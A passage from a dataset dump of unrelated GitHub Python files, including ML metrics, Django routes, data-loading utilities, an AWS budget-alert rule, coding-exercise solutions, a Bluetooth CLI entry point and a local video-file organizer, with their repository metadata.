output[\"similar_ks_minimize\"] = statistics.ks_2samp(\n predictions,\n predictions_min,\n weights1=predictions_weights,\n weights2=predictions_min_weights,\n )\n output[\"similar_ks_max\"] = statistics.ks_2samp(\n predictions_max,\n predictions_min,\n weights1=predictions_max_weights,\n weights2=predictions_min_weights,\n )\n output[\"similar_ks_maximize\"] = statistics.ks_2samp(\n predictions,\n predictions_max,\n weights1=predictions_weights,\n weights2=predictions_max_weights,\n )\n\n return output\n\n\ndef similar_dist(predictions, weights=None, 
true_y=1, threshold=0.5):\n    \"\"\"Metric to evaluate the predictions on one label only for similarity test.\n\n    This metric is used inside the mayou_score\n\n    Parameters\n    ----------\n    predictions : :py:class:`~np.array`\n        The predictions\n    weights : array-like\n        The weights for the predictions\n    true_y : {0, 1}\n        The \"true\" label of the data\n    threshold : float\n        The threshold for the predictions to decide whether a point belongs\n        to 0 or 1.\n    \"\"\"\n    # HACK\n    scale = 2  # otherwise, the predictions will be [-0.5, 0.5]\n    # HACK END\n    data_valid = min(predictions) < threshold < max(predictions)\n    if not data_valid:\n        raise ValueError(\"Predictions are all above or below the threshold\")\n\n    if true_y == 0:\n        predictions = 1 - predictions\n\n    predictions -= threshold\n    predictions *= scale\n    true_pred = predictions[predictions > 0]\n    false_pred = predictions[predictions <= 0] * -1\n\n    true_weights = false_weights = 1\n\n    if not dev_tool.is_in_primitive(weights, None):\n        true_weights = weights[predictions > 0]\n        false_weights = weights[predictions <= 0]\n    else:\n        # sum(weights) below would fail for the default weights=None,\n        # so fall back to unit weights for the normalization.\n        weights = np.ones(len(predictions))\n    score = sum(\n        ((np.exp(1.3 * np.square(true_pred + 0.6)) - 1.5969) * 0.5) * true_weights\n    )\n    score -= sum(\n        ((np.sqrt(false_pred) - np.power(false_pred, 0.8)) * 2) * false_weights\n    )\n    score /= sum(weights)\n\n    return score\n","repo_name":"jonas-eschle/raredecay","sub_path":"raredecay/tools/ml_scores.py","file_name":"ml_scores.py","file_ext":"py","file_size_in_byte":25126,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"21127013903","text":"import torchaudio.transforms as transforms\r\n\r\nclass TimeMaskAugmentor(object):\r\n    def __init__(self, rng, time_T, time_num_mask):\r\n        self._tm = transforms.TimeMasking(time_T)\r\n        self._time_num_mask = time_num_mask\r\n        self._rng = rng\r\n    \r\n    def transform_audio(self, spec):\r\n        for _ in range(self._time_num_mask):\r\n            spec = self._tm(spec, spec.mean())\r\n\r\n        return spec","repo_name":"Rafa-zy/SENT","sub_path":"ASR/augmentor/specaug/timemaskaug.py","file_name":"timemaskaug.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22010670731","text":"from django.urls import path, include\nfrom . 
import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\n\nurlpatterns = [\n path('', views.home),\n path('register/', views.register),\n path('activate//', views.activate_user, name='activate'),\n path('oauth/', include('social_django.urls', namespace='social')),\n path('login/', LoginView.as_view(template_name='account/login.html'), name=\"login\"),\n path('logout/', LogoutView.as_view(template_name='account/logout.html'), name=\"logout\"),\n path('profile/', views.view_profile, name=\"view-profile\"),\n path('follow/', views.follow_view, name='follow-user'),\n path('profile/edit', views.edit_profile, name=\"edit-profile\"),\n path('all/', views.all_users, name=\"all-users\"),\n path('profile//followers', views.profile_followers, name=\"profile-followers\"),\n path('profile//following', views.profile_following, name=\"profile-following\"),\n path('delete/', views.delete_user, name=\"delete-user\"),\n ]","repo_name":"margo-dubovyk/DjangoGram","sub_path":"djangogramm/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8577475265","text":"import os\nimport sys\nimport csv\nimport base64\nimport h5py\nimport pickle\nimport glob\nimport lmdb\n\nimport time\nimport json\nimport errno\nfrom tqdm import tqdm\n\nimport numpy as np\n\nimport torch\n\n\"\"\"\nUtilities for preprocessing sequence data.\n\nSpecial tokens that are in all dictionaries:\n: Extra parts of the sequence that we should ignore\n: Goes at the start of a sequence\n: Goes at the end of a sequence, before tokens\n: Out-of-vocabulary words\n\"\"\"\n\nSPECIAL_TOKENS = {\n '': 0,\n '': 1,\n '': 2,\n '': 3,\n}\n\n\ndef tokenize(s, delim=' ', add_start_token=True, add_end_token=True,\n punct_to_keep=None, punct_to_remove=None):\n \"\"\"\n Tokenize a sequence, converting a string s into a list of (string) tokens by\n splitting on the specified delimiter. 
Optionally keep or remove certain\n punctuation marks and add start and end tokens.\n \"\"\"\n if punct_to_keep is not None:\n for p in punct_to_keep:\n s = s.replace(p, '%s%s' % (delim, p))\n \n if punct_to_remove is not None:\n for p in punct_to_remove:\n s = s.replace(p, '')\n \n # if delim='' then regard the whole s as a token\n tokens = s.split(delim) if delim else [s]\n if add_start_token:\n tokens.insert(0, '')\n if add_end_token:\n tokens.append('')\n return tokens\n\n\ndef build_vocab(sequences, min_token_count=1, delim=' ', punct_to_keep=None,\n punct_to_remove=None, add_special=None):\n token_to_count = {}\n tokenize_kwargs = {\n 'delim': delim,\n 'punct_to_keep': punct_to_keep,\n 'punct_to_remove': punct_to_remove,\n }\n for seq in sequences:\n seq_tokens = tokenize(seq, **tokenize_kwargs,\n add_start_token=False, add_end_token=False)\n for token in seq_tokens:\n if token not in token_to_count:\n token_to_count[token] = 0\n token_to_count[token] += 1\n \n token_to_idx = {}\n if add_special:\n for token in SPECIAL_TOKENS:\n token_to_idx[token] = len(token_to_idx)\n for token, count in sorted(token_to_count.items()):\n if count >= min_token_count:\n token_to_idx[token] = len(token_to_idx)\n \n return token_to_idx\n\n\ndef encode(seq_tokens, token_to_idx, allow_unk=False):\n seq_idx = []\n for token in seq_tokens:\n if token not in token_to_idx:\n if allow_unk:\n token = ''\n else:\n raise KeyError('Token \"%s\" not in vocab' % token)\n seq_idx.append(token_to_idx[token])\n return seq_idx\n\n\ndef decode(seq_idx, idx_to_token, delim=None, stop_at_end=True):\n tokens = []\n for idx in seq_idx:\n tokens.append(idx_to_token[idx])\n if stop_at_end and tokens[-1] == '':\n break\n if delim is None:\n return tokens\n else:\n return delim.join(tokens)\n\n\ncsv.field_size_limit(sys.maxsize)\nFIELDNAMES = [\"img_id\", \"img_h\", \"img_w\", \"objects_id\", \"objects_conf\",\n \"attrs_id\", \"attrs_conf\", \"num_boxes\", \"boxes\", \"features\"]\n\n\ndef load_obj_tsv(fname, topk=None):\n \"\"\"Load object features from tsv file.\n\n :param fname: The path to the tsv file.\n :param topk: Only load features for top K images (lines) in the tsv file.\n Will load all the features if topk is either -1 or None.\n :return: A list of image object features where each feature is a dict.\n See FILENAMES above for the keys in the feature dict.\n \"\"\"\n data = []\n start_time = time.time()\n print(\"Start to load Faster-RCNN detected objects from %s\" % fname)\n with open(fname) as f:\n reader = csv.DictReader(f, FIELDNAMES, delimiter=\"\\t\")\n for i, item in enumerate(reader):\n \n for key in ['img_h', 'img_w', 'num_boxes']:\n item[key] = int(item[key])\n \n boxes = item['num_boxes']\n decode_config = [\n ('objects_id', (boxes,), np.int64),\n ('objects_conf', (boxes,), np.float32),\n ('attrs_id', (boxes,), np.int64),\n ('attrs_conf', (boxes,), np.float32),\n ('boxes', (boxes, 4), np.float32),\n ('features', (boxes, -1), np.float32),\n ]\n for key, shape, dtype in decode_config:\n item[key] = np.frombuffer(base64.b64decode(item[key]),\n dtype=dtype)\n item[key] = item[key].reshape(shape)\n item[key].setflags(write=False)\n \n data.append(item)\n if topk is not None and len(data) == topk:\n break\n elapsed_time = time.time() - start_time\n print(\"Loaded %d images in file %s in %d seconds.\" % (\n len(data), fname, elapsed_time))\n \n return data\n\n\ndef load_obj_h5(data_root, mode, topk=None):\n start_time = time.time()\n fname = os.path.join(data_root, f'{mode}_obj36.h5')\n finfo = 
os.path.join(data_root, f'{mode}_obj36_info.json')\n data_info = load_json(finfo)\n data_info_dict = {datum['img_id']: datum\n for datum in data_info}\n print(f\"Start to load Faster-RCNN detected objects from {fname}\")\n data = []\n h5_file = h5py.File(fname, 'r')\n for key in h5_file.keys():\n temp = {'img_id': int(key)}\n for k in ['img_h', 'img_w', 'num_boxes']:\n temp[k] = data_info_dict[int(key)][k]\n for k in ['attrs_conf', 'attrs_id', 'boxes',\n 'features', 'objects_conf', 'objects_id']:\n temp[k] = h5_file[key].get(k)[:]\n data.append(temp)\n if topk is not None and len(data) == topk:\n break\n elapsed_time = time.time() - start_time\n print(\"Loaded %d images in file %s in %d seconds.\" % (\n len(data), fname, elapsed_time))\n \n return data\n\n\ndef create_dir(path):\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef save_json(data, file_path):\n with open(file_path, \"w\") as f:\n json.dump(data, f, sort_keys=True, indent=4)\n\n\ndef load_json(file_path):\n with open(file_path, \"r\") as f:\n return json.load(f)\n\n\ndef save_pickle(data, data_path, highest=False):\n protocol = 2 if highest else 0\n with open(data_path, \"wb\") as f:\n pickle.dump(data, f, protocol=protocol)\n\n\ndef load_pickle(pickle_file):\n try:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f)\n except UnicodeDecodeError as e:\n with open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f, encoding='latin1')\n except Exception as e:\n print('Unable to load data ', pickle_file, ':', e)\n raise\n return pickle_data\n\n\ndef read_txt(file):\n with open(file, \"r\") as f:\n data = [line.strip('\\n') for line in f.readlines()]\n return data\n\n\ndef write_txt(file, s):\n with open(file, 'a+') as f:\n f.write(s)\n\n\ndef invert_dict(d):\n return {v: k for k, v in d.items()}\n\n\ndef todevice(tensor, device):\n if isinstance(tensor, list) or isinstance(tensor, tuple):\n assert isinstance(tensor[0], torch.Tensor)\n return [todevice(t, device) for t in tensor]\n elif isinstance(tensor, torch.Tensor):\n return tensor.to(device)\n\n\ndef convert_lmdb(lmdb_file, features_dir):\n MAP_SIZE = 1099511627776\n infiles = glob.glob(os.path.join(features_dir, \"*\"))\n id_list = []\n \n env = lmdb.open(lmdb_file, map_size=MAP_SIZE)\n with env.begin(write=True) as txn:\n for infile in tqdm(infiles):\n reader = np.load(infile, allow_pickle=True)\n item = {\"image_id\": reader.item().get(\"image_id\")}\n img_id = str(item[\"image_id\"]).encode()\n id_list.append(img_id)\n item[\"image_h\"] = reader.item().get(\"image_height\")\n item[\"image_w\"] = reader.item().get(\"image_width\")\n item[\"num_boxes\"] = reader.item().get(\"num_boxes\")\n item[\"boxes\"] = reader.item().get(\"bbox\")\n item[\"features\"] = reader.item().get(\"features\")\n txn.put(img_id, pickle.dumps(item))\n txn.put(\"keys\".encode(), pickle.dumps(id_list))\n","repo_name":"jingjing12110/CIB-VQA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22798488337","text":"\"\"\" Module for BudgetModifiedOrDeleted \"\"\"\n\nimport json\n\nfrom reflex_core import AWSRule, subscription_confirmation\n\n\nclass BudgetModifiedOrDeleted(AWSRule):\n \"\"\" A Reflex Rule for detecting the modification or deletion of AWS Budgets \"\"\"\n\n def __init__(self, event):\n super().__init__(event)\n\n def extract_event_data(self, 
event):\n \"\"\" Extract required event data \"\"\"\n self.event_name = event[\"detail\"][\"eventName\"]\n\n if self.event_name == \"UpdateBudget\":\n self.event_type = \"updated\"\n self.budget_name = event[\"detail\"][\"requestParameters\"][\"newBudget\"][\n \"budgetName\"\n ]\n else: # self.event_name == \"DeleteBudget\"\n self.event_type = \"deleted\"\n self.budget_name = event[\"detail\"][\"requestParameters\"][\"budgetName\"]\n\n def resource_compliant(self):\n \"\"\"\n Determine if the resource is compliant with your rule.\n\n Return True if it is compliant, and False if it is not.\n \"\"\"\n # We simply want to know when this event occurs. Since this rule was\n # triggered we know that happened, and we want to alert. Therefore\n # the resource is never compliant.\n return False\n\n def get_remediation_message(self):\n \"\"\" Returns a message about the remediation action that occurred \"\"\"\n return f\"The AWS Budget {self.budget_name} was {self.event_type}.\"\n\n\ndef lambda_handler(event, _):\n \"\"\" Handles the incoming event \"\"\"\n print(event)\n event_payload = json.loads(event[\"Records\"][0][\"body\"])\n if subscription_confirmation.is_subscription_confirmation(event_payload):\n subscription_confirmation.confirm_subscription(event_payload)\n return\n rule = BudgetModifiedOrDeleted(event_payload)\n rule.run_compliance_rule()\n","repo_name":"reflexivesecurity/reflex-aws-budget-modified-or-deleted","sub_path":"source/reflex_aws_budget_modified_or_deleted.py","file_name":"reflex_aws_budget_modified_or_deleted.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74222665768","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def deepestLeavesSum(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n maxd=0\n sums=0\n \n def dfs(node,dep):\n nonlocal maxd\n nonlocal sums\n if dep>maxd:\n maxd=dep\n sums=node.val\n elif dep==maxd:\n sums+=node.val\n if node.left:\n dfs(node.left,dep+1)\n if node.right:\n dfs(node.right,dep+1)\n dfs(root,1)\n return sums","repo_name":"abhi-apple/leetcode","sub_path":"1302-deepest-leaves-sum/1302-deepest-leaves-sum.py","file_name":"1302-deepest-leaves-sum.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28194238331","text":"def read_file_data(path):\n result = []\n with open(path, 'r', encoding='utf8') as datafile:\n for line in datafile:\n result.append(line.strip('\\n').split(','))\n return result\n\n\ndef save_data_to_file(path, data_list):\n with open(path, 'w', encoding='utf8') as datafile:\n for rawdata in data_list:\n datafile.write(','.join(rawdata)+'\\n')\n\n\ndef show_commands(commands):\n for item in commands:\n print(f'{item[0]} - {item[1]}')\n\n\ndef show_route_detail(routes, drivers, buses):\n temp_list = []\n for i in range(0, len(routes)):\n temp_list.append(routes[i].copy())\n for driver in drivers:\n if routes[i][3] == driver[0]:\n temp_list[i][3] = driver[1]\n for bus in buses:\n if routes[i][2] == bus[0]:\n temp_list[i][2] = bus[1]\n show_route(temp_list[i])\n\n\ndef show_driver(record):\n print(\n f'id: {record[0]} | Driver: {record[1].title()} {record[2].title()} | Year of birth: {record[3]} \\n ')\n\n\ndef show_route(record):\n print(\n f'id: {record[0]} | Number: 
{record[1]} | Driver: {record[3].title()} | Bus: {record[2].upper()}\\n ')\n\n\ndef show_bus(record):\n print(\n f'id: {record[0]} | Registration number: {record[1].upper()}\\n ')\n\n\ndef show_drivers_list(drivers):\n for el in drivers:\n show_driver(el)\n\n\ndef show_buses_list(buses):\n for el in buses:\n show_bus(el)\n\n\ndef add_driver(path, drivers):\n id = input('Enter id: ').lower()\n surname = input('Enter surname: ').lower()\n name = input('Enter name: ').lower()\n birth = input('Enter year of birth: ')\n result_record = [id, surname, name, birth]\n drivers.append(result_record)\n save_data_to_file(path, drivers)\n\n\ndef add_bus(path, buses):\n id = input('Enter id: ').lower()\n number = input('Enter registration number: ').lower()\n result_record = [id, number]\n buses.append(result_record)\n save_data_to_file(path, buses)\n\n\ndef add_route(path, routes):\n id = input('Enter id: ').lower()\n number = input('Enter number: ').lower()\n bus_id = input('Enter bus id: ').lower()\n driver_id = input('Enter driver id: ').lower()\n result_record = [id, number, bus_id, driver_id]\n routes.append(result_record)\n save_data_to_file(path, routes)\n\n\ndef delete_record(path, records_list):\n id = input('Enter id of the record: ')\n for record in records_list:\n if record[0] == id:\n records_list.remove(record)\n save_data_to_file(path, records_list)\n","repo_name":"NeaMarySm/python","sub_path":"helloWorld/practice7/buses/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25704331288","text":"\"\"\"Test BaseMerimee.py.\"\"\"\n\nimport unittest\nimport os.path\nfrom BaseMerimee import BaseMerimee, handle_Merimee_csv_row, parse_Merimee_csv\n\n\nclass TestBaseMerimee(unittest.TestCase):\n\n \"\"\"Base class for testing BaseMerimee related methods.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.csv_file = os.path.join(os.path.dirname(__file__),\n 'data', 'merimee-MH-10.csv')\n\n cls.merimee_row = {'ADRS': u'Dans le cimeti\\xe8re',\n 'LOCA': u'Champagne-Ardenne ; Aube ; Aix-en-Othe',\n 'SCLE': u'15e si\\xe8cle ; 16e si\\xe8cle',\n 'COM': u'Aix-en-Othe',\n 'ETUD': u'Recensement immeubles MH',\n 'STAT': u'Propri\\xe9t\\xe9 de la commune',\n 'PPRO': u'Chapelle Saint-Avit (cad. 
AC 4) : inscription par arr\\xeat\\xe9 du 28 janvier 1975',\n 'DPT': u'10',\n 'INSEE': u'10003',\n 'AUTR': u'',\n 'AFFE': u'',\n 'REF': u'PA00078014',\n 'REG': u'Champagne-Ardenne',\n 'TICO': u'Chapelle Saint-Avit'}\n cls.merimee_row_enriched = cls.merimee_row.copy()\n cls.merimee_row_enriched['MH_TYPE'] = 'inscrit'\n\n def test_handle_Merimee_csv_row(self):\n \"\"\"Test handle_Merimee_csv_row().\"\"\"\n result = handle_Merimee_csv_row(self.merimee_row)\n self.assertEqual(result, self.merimee_row_enriched)\n\n def test_parse_Merimee_csv(self):\n result = parse_Merimee_csv(self.csv_file)\n self.assertEqual(result['PA00078014'], self.merimee_row_enriched)\n","repo_name":"JeanFred/MerimeeMaintenace","sub_path":"test/test_BaseMerimee.py","file_name":"test_BaseMerimee.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38789126090","text":"import time\nimport torch\nimport numpy as np\nimport sys\n\n \n\ndef meshgrid(x, y, row_major=True):\n xx = x.repeat(len(y))\n yy = y.view(-1, 1).repeat(1, len(x)).view(-1)\n if row_major:\n return xx, yy\n else:\n return yy, xx\n\ndef valid_flags(featmap_size, valid_size, num_base_anchors, device='cuda'):\n feat_h, feat_w = featmap_size\n valid_h, valid_w = valid_size\n assert valid_h <= feat_h and valid_w <= feat_w\n valid_x = torch.zeros(feat_w, dtype=torch.uint8, device=device)\n valid_y = torch.zeros(feat_h, dtype=torch.uint8, device=device)\n valid_x[:valid_w] = 1\n valid_y[:valid_h] = 1\n valid_xx, valid_yy = meshgrid(valid_x, valid_y)\n valid = valid_xx & valid_yy\n valid = valid[:, None].expand(\n valid.size(0), num_base_anchors).contiguous().view(-1)\n return valid\n\n@torch.jit.script\ndef fast_valid(featmap_size: tuple, valid_size: tuple, num_base_anchors: int, device='cuda'):\n feat_h, feat_w = featmap_size\n valid_h, valid_w = valid_size\n assert valid_h <= feat_h and valid_w <= feat_w\n valid_x = torch.zeros(feat_w, dtype=torch.uint8, device=device)\n valid_y = torch.zeros(feat_h, dtype=torch.uint8, device=device)\n valid_x[:valid_w] = 1\n valid_y[:valid_h] = 1\n valid_xx, valid_yy = meshgrid(valid_x, valid_y)\n valid = valid_xx & valid_yy\n valid = valid[:, None].expand(\n valid.size(0), num_base_anchors).contiguous().view(-1)\n return valid\n\nif __name__ == \"__main__\":\n\n # M, N denotes the featmap size\n # K means the number of base anchors\n if(len(sys.argv) == 4):\n M = int(sys.argv[1])\n N = int(sys.argv[2])\n K = int(sys.argv[3])\n\n else:\n M = 160\n N = 120\n K = 3\n \n featmap_size = (M, N)\n valid_size = (M, N)\n num_base_anchors = K\n\n sfunc = valid_flags\n sargs_list = [featmap_size, valid_size, num_base_anchors]\n assert torch.allclose(\n valid_flags(*sargs_list), fast_valid(*sargs_list), equal_nan=True)\n\n # performance check\n torch.cuda.synchronize()\n time_before = time.time()\n\n for _ in range(10000):\n ret = valid_flags(*sargs_list)\n\n torch.cuda.synchronize()\n time_mid = time.time()\n\n for _ in range(10000):\n ret = fast_valid(*sargs_list)\n\n torch.cuda.synchronize()\n time_end = time.time()\n print(\"time costing torch: \" + str(time_mid - time_before))\n print(\"time costing torchscript: \" + str(time_end - time_mid))\n","repo_name":"leleucas/compiler-paper","sub_path":"cases/pytorch/valid_flags.py","file_name":"valid_flags.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32335232462","text":"points = 
[10, 8, 6, 5, 4, 3, 2, 1, 0]\r\ntimes = sorted([list(input().split()) for _ in range(8)])\r\nb, r = 0, 0\r\n\r\nfor i in range(8):\r\n    if times[i][1] == 'B':\r\n        b += points[i]\r\n    else:\r\n        r += points[i]\r\nprint(\"Red\" if r > b else \"Blue\")","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/27522.py","file_name":"27522.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36606815211","text":"\n\"\"\"\nunitooth - main program entry\n\"\"\"\n\n# built-in\nimport sys\nimport argparse\n\n# package\nfrom . import connect\nfrom . import find\nfrom . import listen\n\ndef main():\n    \"\"\" unitooth entry \"\"\"\n\n    # Initialize argparse\n    parser = argparse.ArgumentParser(\n        description=\"A PyBluez wrapper for Unity applications\",\n        epilog=\"Developed by University of Wisconsin-Madison Undergraduates\",\n        prog=\"ut\"\n    )\n\n    # Add capability for subparsers\n    subparser = parser.add_subparsers()\n\n    # Add sub-commands\n    find.init_args(subparser)\n    listen.init_args(subparser)\n    connect.init_args(subparser)\n\n    # Prevent stack-trace dump if no arguments are given\n    if len(sys.argv) == 1:\n        sys.argv.append(\"\")\n\n    # Parse arguments and then run the chosen command\n    args = parser.parse_args(sys.argv[1:])\n    return args.handler(args)\n","repo_name":"sjfricke/UniTooth","sub_path":"src/Python/unitooth/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"74056988648","text":"#coding:utf-8\nimport os \nimport shutil\nimport glob\ndestdir=r'J:\\med'\nsrcdir='J:\\迅雷下载'\ntype_list=['rmvb','avi','mp4','wmv']\nprint('destdir: '+destdir)\nprint('srcdir: '+srcdir)\n\n'''return a list containing all the files in file_dir'''\ndef all_file(file_dir):\n    file_list=[]\n    name_list=os.listdir(file_dir)\n    for each_f in name_list:\n        if os.path.isfile(os.path.join(file_dir,each_f)):\n            file_list.append(os.path.join(file_dir,each_f))\n        elif os.path.isdir(os.path.join(file_dir,each_f)):\n            newdir=os.path.join(file_dir,each_f)\n            file_list.extend(all_file(newdir))\n    return file_list \n\n\n'return all the dir in file_dir'\ndef all_dir(file_dir):\n    dir_list=[]\n    name_list=os.listdir(file_dir)\n    for each_f in name_list:\n        if os.path.isfile(os.path.join(file_dir,each_f)):\n            pass\n        elif os.path.isdir(os.path.join(file_dir,each_f)):\n            newdir=os.path.join(file_dir,each_f)\n            dir_list.append(newdir)\n            dir_list.extend(all_dir(newdir))\n    return dir_list \n    \n'''return a list containing all the files of some certain types'''\ndef select_type(file_list,type_list):\n    selected_list=[]\n    for each_file in file_list:\n        if each_file.split('.')[-1] in type_list:\n            selected_list.append(each_file)\n    return selected_list\n\ndef print_list(a_list):\n    for each_l in a_list:\n        print(each_l)\n\n\nselected_list=select_type(all_file(srcdir),type_list)\nprint_list(selected_list)\nflag=0\n\n# iterate over a copy, since items may be removed from selected_list below\nfor each_file in list(selected_list):\n    print('start moving file: '+each_file)\n    print(flag)\n    if 0==flag:\n        print('sure to move '+each_file+' to '+destdir+' ?(y/n/a)')\n        move=input()\n    else :\n        move=r'y'\n    print(move)\n    if 'y' in move or 'Y' in move:\n        print('moving '+each_file)\n        shutil.copy(each_file,destdir)\n        print(each_file+' moved')\n    elif 'a' in move or 'A' in move:\n        flag=1\n        print('moving '+each_file)\n        shutil.copy(each_file,destdir)\n        print(each_file+' moved') \n    else:\n        selected_list.remove(each_file)\nfor each_file in 
selected_list:\n os.remove(each_file)\n print(each_file+'removed')\nprint('remove complete')\n\n\nall_dirs=all_dir(srcdir)\ntargetdir=[]\nfor each_dir in all_dirs:\n if 'Thz.la' in each_dir:\n targetdir.append(each_dir)\n else:\n print(each_dir+' remained')\n pass\nprint('')\nprint(targetdir)\nfor each_dir in targetdir:\n shutil.rmtree(each_dir)\n print(each_dir+' removed')\n\n\n\n\n\n\n\n\n\n\n \n \n","repo_name":"chengxuanxie/file_collecting","sub_path":"file_moving.py","file_name":"file_moving.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26076463202","text":"#! /usr/bin/env python3.7\n\nfrom os import environ\nfrom sys import path\n\npath.append(environ['HOME'] + '/Workspace/Sys/pycharm_projs/galg/')\n\nfrom array import array\nfrom arrays.minimum_bribes import quick_minimum_bribes\n\n\ndef main():\n with open(\"test_minimum_bribes_001.txt\", 'r') as f:\n arr = [int(x) for x in f.read().rstrip().split(', ')]\n\n print(\"Debug Test 002\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [2, 3, 1, 4, 5, 7, 8, 6, 9, 11, 10]) # expect 5\n\n print(\"Debug Test 002\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [5, 1, 2, 3, 7, 8, 6, 4]) # Too chaotic\n\n print(\"Debug Test 002\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [1, 2, 5, 3, 7, 8, 6, 4]) # except 7\n\n print(\"Debug Test 003\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n arr = array('i', [2, 1, 5, 3, 4]) # expect 3\n\n print(\"Debug Test 001\\n\" + \"-\" * 30)\n print(\"Input array: {}\".format(arr))\n quick_minimum_bribes(arr)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gonzo-soc/galg","sub_path":"arrays/tests/minimum_bribes_tests.py","file_name":"minimum_bribes_tests.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328597288","text":"import numpy as np\nfrom scipy import sparse as ss\n\nimport torch\nfrom torch.utils.data import TensorDataset\nfrom knodle.trainer.snorkel.utils import (\n z_t_matrix_to_snorkel_matrix,\n prepare_empty_rule_matches,\n add_labels_for_empty_examples\n)\n\n\ndef test_z_t_matrix_to_snorkel_matrix():\n # test dense case\n z = np.array([\n [0, 1, 0, 0],\n [0, 0, 1, 1]\n ])\n\n t = np.array([\n [1, 0],\n [0, 1],\n [1, 0],\n [0, 1]\n ])\n\n snorkel_gold = np.array([\n [-1, 1, -1, -1],\n [-1, -1, 0, 1]\n ])\n\n snorkel_test = z_t_matrix_to_snorkel_matrix(z, t)\n np.testing.assert_equal(snorkel_gold, snorkel_test)\n\n # test sparse case\n z = ss.csr_matrix([\n [0, 1, 0, 0],\n [0, 0, 1, 1]\n ])\n\n t = ss.csr_matrix([\n [1, 0],\n [0, 1],\n [1, 0],\n [0, 1]\n ])\n\n snorkel_gold = np.array([\n [-1, 1, -1, -1],\n [-1, -1, 0, 1]\n ])\n\n snorkel_test = z_t_matrix_to_snorkel_matrix(z, t)\n np.testing.assert_equal(snorkel_gold, snorkel_test)\n\n\ndef test_label_model_data():\n num_samples = 5\n num_rules = 6\n\n rule_matches_z = np.ones((num_samples, num_rules))\n rule_matches_z[[1, 4]] = 0\n\n non_zero_mask, out_rule_matches_z = prepare_empty_rule_matches(rule_matches_z)\n\n expected_mask = np.array([True, False, True, True, False])\n expected_rule_matches = np.ones((3, num_rules))\n\n np.testing.assert_equal(non_zero_mask, expected_mask)\n 
np.testing.assert_equal(out_rule_matches_z, expected_rule_matches)\n\n\ndef test_other_class_labels():\n label_probs_gen = np.array([\n [0.3, 0.6, 0.0, 0.1],\n [0.2, 0.2, 0.2, 0.4],\n [1.0, 0.0, 0.0, 0.0]\n ])\n output_classes = 5\n other_class_id = 4\n\n # test without empty rows\n non_zero_mask = np.array([True, True, True])\n expected_probs = np.array([\n [0.3, 0.6, 0.0, 0.1, 0.0],\n [0.2, 0.2, 0.2, 0.4, 0.0],\n [1.0, 0.0, 0.0, 0.0, 0.0]\n ])\n label_probs = add_labels_for_empty_examples(label_probs_gen, non_zero_mask, output_classes, other_class_id)\n\n np.testing.assert_equal(label_probs, expected_probs)\n\n # test with empty rows\n non_zero_mask = np.array([True, False, False, True, True])\n expected_probs = np.array([\n [0.3, 0.6, 0.0, 0.1, 0.0],\n [0.0, 0.0, 0.0, 0.0, 1.0],\n [0.0, 0.0, 0.0, 0.0, 1.0],\n [0.2, 0.2, 0.2, 0.4, 0.0],\n [1.0, 0.0, 0.0, 0.0, 0.0]\n ])\n label_probs = add_labels_for_empty_examples(label_probs_gen, non_zero_mask, output_classes, other_class_id)\n\n np.testing.assert_equal(label_probs, expected_probs)\n","repo_name":"knodle/knodle","sub_path":"tests/trainer/snorkel/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"9289192713","text":"\nclass ConversionNotPossible(Exception):\n pass\n\ndef convert(fromUnit, toUnit, value):\n\n temperature_conversions = {\n 